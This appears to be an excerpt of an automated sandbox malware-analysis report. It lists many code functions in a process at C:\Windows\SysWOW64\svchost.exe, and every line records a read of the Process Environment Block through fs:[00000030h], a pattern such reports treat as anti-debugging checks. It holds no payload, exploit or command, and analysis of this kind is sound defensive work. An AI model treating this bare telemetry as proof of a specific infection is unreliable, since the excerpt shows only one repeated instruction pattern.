Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033D43D4 mov eax, dword ptr fs:[00000030h]	3_2_033D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033EC3CD mov eax, dword ptr fs:[00000030h]	3_2_033EC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0333A3C0 mov eax, dword ptr fs:[00000030h]	3_2_0333A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0333A3C0 mov eax, dword ptr fs:[00000030h]	3_2_0333A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0333A3C0 mov eax, dword ptr fs:[00000030h]	3_2_0333A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0333A3C0 mov eax, dword ptr fs:[00000030h]	3_2_0333A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0333A3C0 mov eax, dword ptr fs:[00000030h]	3_2_0333A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0333A3C0 mov eax, dword ptr fs:[00000030h]	3_2_0333A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033383C0 mov eax, dword ptr fs:[00000030h]	3_2_033383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033383C0 mov eax, dword ptr fs:[00000030h]	3_2_033383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033383C0 mov eax, dword ptr fs:[00000030h]	3_2_033383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033383C0 mov eax, dword ptr fs:[00000030h]	3_2_033383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033B63C0 mov eax, dword ptr fs:[00000030h]	3_2_033B63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0332823B mov eax, dword ptr fs:[00000030h]	3_2_0332823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033E0274 mov eax, dword ptr fs:[00000030h]	3_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033E0274 mov eax, dword ptr fs:[00000030h]	3_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033E0274 mov eax, dword ptr fs:[00000030h]	3_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033E0274 mov eax, dword ptr fs:[00000030h]	3_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033E0274 mov eax, dword ptr fs:[00000030h]	3_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033E0274 mov eax, dword ptr fs:[00000030h]	3_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033E0274 mov eax, dword ptr fs:[00000030h]	3_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033E0274 mov eax, dword ptr fs:[00000030h]	3_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033E0274 mov eax, dword ptr fs:[00000030h]	3_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033E0274 mov eax, dword ptr fs:[00000030h]	3_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033E0274 mov eax, dword ptr fs:[00000030h]	3_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033E0274 mov eax, dword ptr fs:[00000030h]	3_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03334260 mov eax, dword ptr fs:[00000030h]	3_2_03334260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03334260 mov eax, dword ptr fs:[00000030h]	3_2_03334260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03334260 mov eax, dword ptr fs:[00000030h]	3_2_03334260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0332826B mov eax, dword ptr fs:[00000030h]	3_2_0332826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0332A250 mov eax, dword ptr fs:[00000030h]	3_2_0332A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03336259 mov eax, dword ptr fs:[00000030h]	3_2_03336259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033EA250 mov eax, dword ptr fs:[00000030h]	3_2_033EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033EA250 mov eax, dword ptr fs:[00000030h]	3_2_033EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033B8243 mov eax, dword ptr fs:[00000030h]	3_2_033B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033B8243 mov ecx, dword ptr fs:[00000030h]	3_2_033B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033402A0 mov eax, dword ptr fs:[00000030h]	3_2_033402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033402A0 mov eax, dword ptr fs:[00000030h]	3_2_033402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033C62A0 mov eax, dword ptr fs:[00000030h]	3_2_033C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033C62A0 mov ecx, dword ptr fs:[00000030h]	3_2_033C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033C62A0 mov eax, dword ptr fs:[00000030h]	3_2_033C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033C62A0 mov eax, dword ptr fs:[00000030h]	3_2_033C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033C62A0 mov eax, dword ptr fs:[00000030h]	3_2_033C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033C62A0 mov eax, dword ptr fs:[00000030h]	3_2_033C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0336E284 mov eax, dword ptr fs:[00000030h]	3_2_0336E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0336E284 mov eax, dword ptr fs:[00000030h]	3_2_0336E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033B0283 mov eax, dword ptr fs:[00000030h]	3_2_033B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033B0283 mov eax, dword ptr fs:[00000030h]	3_2_033B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033B0283 mov eax, dword ptr fs:[00000030h]	3_2_033B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033402E1 mov eax, dword ptr fs:[00000030h]	3_2_033402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033402E1 mov eax, dword ptr fs:[00000030h]	3_2_033402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033402E1 mov eax, dword ptr fs:[00000030h]	3_2_033402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0333A2C3 mov eax, dword ptr fs:[00000030h]	3_2_0333A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0333A2C3 mov eax, dword ptr fs:[00000030h]	3_2_0333A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0333A2C3 mov eax, dword ptr fs:[00000030h]	3_2_0333A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0333A2C3 mov eax, dword ptr fs:[00000030h]	3_2_0333A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0333A2C3 mov eax, dword ptr fs:[00000030h]	3_2_0333A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03360124 mov eax, dword ptr fs:[00000030h]	3_2_03360124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033DA118 mov ecx, dword ptr fs:[00000030h]	3_2_033DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033DA118 mov eax, dword ptr fs:[00000030h]	3_2_033DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033DA118 mov eax, dword ptr fs:[00000030h]	3_2_033DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033DA118 mov eax, dword ptr fs:[00000030h]	3_2_033DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033F0115 mov eax, dword ptr fs:[00000030h]	3_2_033F0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033DE10E mov eax, dword ptr fs:[00000030h]	3_2_033DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033DE10E mov ecx, dword ptr fs:[00000030h]	3_2_033DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033DE10E mov eax, dword ptr fs:[00000030h]	3_2_033DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033DE10E mov eax, dword ptr fs:[00000030h]	3_2_033DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033DE10E mov ecx, dword ptr fs:[00000030h]	3_2_033DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033DE10E mov eax, dword ptr fs:[00000030h]	3_2_033DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033DE10E mov eax, dword ptr fs:[00000030h]	3_2_033DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033DE10E mov ecx, dword ptr fs:[00000030h]	3_2_033DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033DE10E mov eax, dword ptr fs:[00000030h]	3_2_033DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033DE10E mov ecx, dword ptr fs:[00000030h]	3_2_033DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0332C156 mov eax, dword ptr fs:[00000030h]	3_2_0332C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033C8158 mov eax, dword ptr fs:[00000030h]	3_2_033C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03336154 mov eax, dword ptr fs:[00000030h]	3_2_03336154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03336154 mov eax, dword ptr fs:[00000030h]	3_2_03336154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033C4144 mov eax, dword ptr fs:[00000030h]	3_2_033C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033C4144 mov eax, dword ptr fs:[00000030h]	3_2_033C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033C4144 mov ecx, dword ptr fs:[00000030h]	3_2_033C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033C4144 mov eax, dword ptr fs:[00000030h]	3_2_033C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033C4144 mov eax, dword ptr fs:[00000030h]	3_2_033C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033B019F mov eax, dword ptr fs:[00000030h]	3_2_033B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033B019F mov eax, dword ptr fs:[00000030h]	3_2_033B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033B019F mov eax, dword ptr fs:[00000030h]	3_2_033B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033B019F mov eax, dword ptr fs:[00000030h]	3_2_033B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0332A197 mov eax, dword ptr fs:[00000030h]	3_2_0332A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0332A197 mov eax, dword ptr fs:[00000030h]	3_2_0332A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0332A197 mov eax, dword ptr fs:[00000030h]	3_2_0332A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034061E5 mov eax, dword ptr fs:[00000030h]	3_2_034061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03370185 mov eax, dword ptr fs:[00000030h]	3_2_03370185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033EC188 mov eax, dword ptr fs:[00000030h]	3_2_033EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033EC188 mov eax, dword ptr fs:[00000030h]	3_2_033EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033D4180 mov eax, dword ptr fs:[00000030h]	3_2_033D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033D4180 mov eax, dword ptr fs:[00000030h]	3_2_033D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033601F8 mov eax, dword ptr fs:[00000030h]	3_2_033601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033AE1D0 mov eax, dword ptr fs:[00000030h]	3_2_033AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033AE1D0 mov eax, dword ptr fs:[00000030h]	3_2_033AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033AE1D0 mov ecx, dword ptr fs:[00000030h]	3_2_033AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033AE1D0 mov eax, dword ptr fs:[00000030h]	3_2_033AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033AE1D0 mov eax, dword ptr fs:[00000030h]	3_2_033AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033F61C3 mov eax, dword ptr fs:[00000030h]	3_2_033F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033F61C3 mov eax, dword ptr fs:[00000030h]	3_2_033F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033C6030 mov eax, dword ptr fs:[00000030h]	3_2_033C6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0332A020 mov eax, dword ptr fs:[00000030h]	3_2_0332A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0332C020 mov eax, dword ptr fs:[00000030h]	3_2_0332C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0334E016 mov eax, dword ptr fs:[00000030h]	3_2_0334E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0334E016 mov eax, dword ptr fs:[00000030h]	3_2_0334E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0334E016 mov eax, dword ptr fs:[00000030h]	3_2_0334E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0334E016 mov eax, dword ptr fs:[00000030h]	3_2_0334E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033B4000 mov ecx, dword ptr fs:[00000030h]	3_2_033B4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033D2000 mov eax, dword ptr fs:[00000030h]	3_2_033D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033D2000 mov eax, dword ptr fs:[00000030h]	3_2_033D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033D2000 mov eax, dword ptr fs:[00000030h]	3_2_033D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033D2000 mov eax, dword ptr fs:[00000030h]	3_2_033D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033D2000 mov eax, dword ptr fs:[00000030h]	3_2_033D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033D2000 mov eax, dword ptr fs:[00000030h]	3_2_033D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033D2000 mov eax, dword ptr fs:[00000030h]	3_2_033D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033D2000 mov eax, dword ptr fs:[00000030h]	3_2_033D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0335C073 mov eax, dword ptr fs:[00000030h]	3_2_0335C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03332050 mov eax, dword ptr fs:[00000030h]	3_2_03332050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033B6050 mov eax, dword ptr fs:[00000030h]	3_2_033B6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033F60B8 mov eax, dword ptr fs:[00000030h]	3_2_033F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033F60B8 mov ecx, dword ptr fs:[00000030h]	3_2_033F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033C80A8 mov eax, dword ptr fs:[00000030h]	3_2_033C80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0333208A mov eax, dword ptr fs:[00000030h]	3_2_0333208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0332C0F0 mov eax, dword ptr fs:[00000030h]	3_2_0332C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033720F0 mov ecx, dword ptr fs:[00000030h]	3_2_033720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0332A0E3 mov ecx, dword ptr fs:[00000030h]	3_2_0332A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033380E9 mov eax, dword ptr fs:[00000030h]	3_2_033380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033B60E0 mov eax, dword ptr fs:[00000030h]	3_2_033B60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033B20DE mov eax, dword ptr fs:[00000030h]	3_2_033B20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0336273C mov eax, dword ptr fs:[00000030h]	3_2_0336273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0336273C mov ecx, dword ptr fs:[00000030h]	3_2_0336273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0336273C mov eax, dword ptr fs:[00000030h]	3_2_0336273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033AC730 mov eax, dword ptr fs:[00000030h]	3_2_033AC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0336C720 mov eax, dword ptr fs:[00000030h]	3_2_0336C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0336C720 mov eax, dword ptr fs:[00000030h]	3_2_0336C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03330710 mov eax, dword ptr fs:[00000030h]	3_2_03330710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03360710 mov eax, dword ptr fs:[00000030h]	3_2_03360710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0336C700 mov eax, dword ptr fs:[00000030h]	3_2_0336C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03338770 mov eax, dword ptr fs:[00000030h]	3_2_03338770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03340770 mov eax, dword ptr fs:[00000030h]	3_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03340770 mov eax, dword ptr fs:[00000030h]	3_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03340770 mov eax, dword ptr fs:[00000030h]	3_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03340770 mov eax, dword ptr fs:[00000030h]	3_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03340770 mov eax, dword ptr fs:[00000030h]	3_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03340770 mov eax, dword ptr fs:[00000030h]	3_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03340770 mov eax, dword ptr fs:[00000030h]	3_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03340770 mov eax, dword ptr fs:[00000030h]	3_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03340770 mov eax, dword ptr fs:[00000030h]	3_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03340770 mov eax, dword ptr fs:[00000030h]	3_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03340770 mov eax, dword ptr fs:[00000030h]	3_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03340770 mov eax, dword ptr fs:[00000030h]	3_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03330750 mov eax, dword ptr fs:[00000030h]	3_2_03330750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033BE75D mov eax, dword ptr fs:[00000030h]	3_2_033BE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03372750 mov eax, dword ptr fs:[00000030h]	3_2_03372750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03372750 mov eax, dword ptr fs:[00000030h]	3_2_03372750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033B4755 mov eax, dword ptr fs:[00000030h]	3_2_033B4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0336674D mov esi, dword ptr fs:[00000030h]	3_2_0336674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0336674D mov eax, dword ptr fs:[00000030h]	3_2_0336674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0336674D mov eax, dword ptr fs:[00000030h]	3_2_0336674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033307AF mov eax, dword ptr fs:[00000030h]	3_2_033307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033E47A0 mov eax, dword ptr fs:[00000030h]	3_2_033E47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033D678E mov eax, dword ptr fs:[00000030h]	3_2_033D678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033347FB mov eax, dword ptr fs:[00000030h]	3_2_033347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033347FB mov eax, dword ptr fs:[00000030h]	3_2_033347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033527ED mov eax, dword ptr fs:[00000030h]	3_2_033527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033527ED mov eax, dword ptr fs:[00000030h]	3_2_033527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033527ED mov eax, dword ptr fs:[00000030h]	3_2_033527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033BE7E1 mov eax, dword ptr fs:[00000030h]	3_2_033BE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0333C7C0 mov eax, dword ptr fs:[00000030h]	3_2_0333C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033B07C3 mov eax, dword ptr fs:[00000030h]	3_2_033B07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0334E627 mov eax, dword ptr fs:[00000030h]	3_2_0334E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03366620 mov eax, dword ptr fs:[00000030h]	3_2_03366620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03368620 mov eax, dword ptr fs:[00000030h]	3_2_03368620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0333262C mov eax, dword ptr fs:[00000030h]	3_2_0333262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03372619 mov eax, dword ptr fs:[00000030h]	3_2_03372619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033AE609 mov eax, dword ptr fs:[00000030h]	3_2_033AE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0334260B mov eax, dword ptr fs:[00000030h]	3_2_0334260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0334260B mov eax, dword ptr fs:[00000030h]	3_2_0334260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0334260B mov eax, dword ptr fs:[00000030h]	3_2_0334260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0334260B mov eax, dword ptr fs:[00000030h]	3_2_0334260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0334260B mov eax, dword ptr fs:[00000030h]	3_2_0334260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0334260B mov eax, dword ptr fs:[00000030h]	3_2_0334260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0334260B mov eax, dword ptr fs:[00000030h]	3_2_0334260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03362674 mov eax, dword ptr fs:[00000030h]	3_2_03362674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033F866E mov eax, dword ptr fs:[00000030h]	3_2_033F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033F866E mov eax, dword ptr fs:[00000030h]	3_2_033F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0336A660 mov eax, dword ptr fs:[00000030h]	3_2_0336A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0336A660 mov eax, dword ptr fs:[00000030h]	3_2_0336A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0334C640 mov eax, dword ptr fs:[00000030h]	3_2_0334C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033666B0 mov eax, dword ptr fs:[00000030h]	3_2_033666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0336C6A6 mov eax, dword ptr fs:[00000030h]	3_2_0336C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03334690 mov eax, dword ptr fs:[00000030h]	3_2_03334690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03334690 mov eax, dword ptr fs:[00000030h]	3_2_03334690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033AE6F2 mov eax, dword ptr fs:[00000030h]	3_2_033AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033AE6F2 mov eax, dword ptr fs:[00000030h]	3_2_033AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033AE6F2 mov eax, dword ptr fs:[00000030h]	3_2_033AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033AE6F2 mov eax, dword ptr fs:[00000030h]	3_2_033AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033B06F1 mov eax, dword ptr fs:[00000030h]	3_2_033B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033B06F1 mov eax, dword ptr fs:[00000030h]	3_2_033B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0336A6C7 mov ebx, dword ptr fs:[00000030h]	3_2_0336A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0336A6C7 mov eax, dword ptr fs:[00000030h]	3_2_0336A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03340535 mov eax, dword ptr fs:[00000030h]	3_2_03340535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03340535 mov eax, dword ptr fs:[00000030h]	3_2_03340535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03340535 mov eax, dword ptr fs:[00000030h]	3_2_03340535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03340535 mov eax, dword ptr fs:[00000030h]	3_2_03340535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03340535 mov eax, dword ptr fs:[00000030h]	3_2_03340535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03340535 mov eax, dword ptr fs:[00000030h]	3_2_03340535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0335E53E mov eax, dword ptr fs:[00000030h]	3_2_0335E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0335E53E mov eax, dword ptr fs:[00000030h]	3_2_0335E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0335E53E mov eax, dword ptr fs:[00000030h]	3_2_0335E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0335E53E mov eax, dword ptr fs:[00000030h]	3_2_0335E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0335E53E mov eax, dword ptr fs:[00000030h]	3_2_0335E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033C6500 mov eax, dword ptr fs:[00000030h]	3_2_033C6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03404500 mov eax, dword ptr fs:[00000030h]	3_2_03404500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03404500 mov eax, dword ptr fs:[00000030h]	3_2_03404500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03404500 mov eax, dword ptr fs:[00000030h]	3_2_03404500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03404500 mov eax, dword ptr fs:[00000030h]	3_2_03404500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03404500 mov eax, dword ptr fs:[00000030h]	3_2_03404500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03404500 mov eax, dword ptr fs:[00000030h]	3_2_03404500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03404500 mov eax, dword ptr fs:[00000030h]	3_2_03404500
